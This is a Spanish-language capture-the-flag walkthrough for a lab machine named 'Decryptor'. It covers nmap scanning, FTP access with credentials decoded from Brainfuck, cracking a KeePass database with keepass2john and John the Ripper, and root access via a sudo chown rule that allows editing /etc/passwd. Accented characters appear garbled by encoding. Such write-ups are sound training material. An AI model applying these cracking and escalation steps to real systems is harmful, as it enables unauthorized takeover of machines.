# Decryptor
### 馃攳 **RECONOCIMIENTO**
En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando:
```bash
ping -c 1 192.168.1.83
```
para verificar la conectividad de red.
A continuaci贸n, se realiza el comando:
```bash
nmap -sVC -p- -n --min-rate 5000 192.168.1.83
```
para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP.
Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH,** el **puerto 80** perteneciente al **servicio HTTP** y el **puerto 2121** perteneciente al **servicio FTP** est谩n abiertos por lo que a continuaci贸n se indagar谩 m谩s.
### 馃攷 **EXPLORACI脫N**
Se utiliza el comando:
```bash
sudo nmap -sCV -p22,80,2121 -v 192.168.1.83
```
para obtener m谩s informaci贸n sobre ese puerto espec铆ficamente.
Seguimos indagando m谩s sobre los puertos y ahora exploramos el servicio **HTTP**. Ingresamos la IP y nos encontramos la p谩gina de por defecto de **Apache**.
Revisando el c贸digo fuente encontramos un c贸digo en **Brainfuck**, por lo que vamos a descifrarlo.
Probamos con el servicio FTP descubierto antes con esas supuestas credenciales.
```bash
ftp 192.168.1.83 -p 2121
```
Listando encontramos un archivo llamado `user.kdbx` por lo que nos lo descargamos a nuestra m谩quina para echarle un vistazo.
### 馃殌 **EXPLOTACI脫N**
Al abrirlo descubrimos que tiene contrase帽a.
**keepass2john** es una herramienta utilizada para convertir archivos de bases de datos de KeePass (.kdbx) a un formato compatible con herramientas de recuperaci贸n de contrase帽as como **John the Ripper**. Esta conversi贸n permite que John the Ripper procese el archivo y realice ataques de fuerza bruta u otros m茅todos para recuperar las contrase帽as almacenadas en la base de datos de KeePass.
```bash
keepass2john user.kdbx >> hash.txt
```
Realizamos John.
```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```
Hemos descubierto la contrase帽a por lo que volvemos a entrar.
Descubrimos unas credenciales por lo que iniciamos sesi贸n a trav茅s de **SSH**.
### 馃攼 PRIVILEGIOS
Al estar dentro y ejecutar:
```bash
whoami
```
a煤n no somos **root**, por lo que hacemos:
```bash
sudo -l
```
para ver si hay algo para explotar.
Vemos que tenemos permisos sudo con **chown** por lo que miramos [GTFOBins ](https://gtfobins.github.io/gtfobins/chown/)para ver como podemos escalar privilegios. Para lograr esto, procederemos a modificar los permisos del archivo **/etc/passwd**, como se puede observar a continuaci贸n.
```bash
ls -la /etc/passwd
sudo /usr/bin/chown chiquero /etc/passwd
```
Ahora con nano quitamos los permisos.
```bash
nano /etc/passwd
cat /etc/passwd
```
Ahora restauramos los permisos a su configuraci贸n original.
```bash
sudo /usr/bin/chown root /etc/passwd
```
Comprobamos.
```bash
ls -la /etc/passwd
```
Con el comando `su` ya somos **root**.
Te deseo mucho 茅xito en tu b煤squeda de las flags! Recuerda prestar atenci贸n a cada detalle, examinar los archivos y servicios con detenimiento, y utilizar todas las herramientas disponibles para encontrarlas. La clave para el 茅xito est谩 en la perseverancia y en no dejar ning煤n rinc贸n sin explorar. 隆Adelante, hacker! 馃捇馃攳馃殌
